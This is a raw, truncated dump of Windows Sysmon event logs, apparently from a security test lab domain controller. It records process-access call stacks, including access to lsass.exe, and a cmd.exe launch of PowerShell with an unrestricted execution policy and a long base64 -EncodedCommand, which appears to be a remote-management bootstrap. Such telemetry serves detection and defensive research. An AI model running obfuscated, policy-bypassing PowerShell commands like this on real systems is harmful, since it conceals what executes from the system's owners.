AHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8518-5FCF-CA02-000000009001}2508C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8518-5FCF-CA02-000000009001}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8518-5FCF-CA02-000000009001}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-8518-5FCF-C802-000000009001}16165076C:\Windows\system32\WinrsHost.exe{10ACEC4A-8518-5FCF-CA02-000000009001}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.388{10ACEC4A-8518-5FCF-CA02-000000009001}2508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAH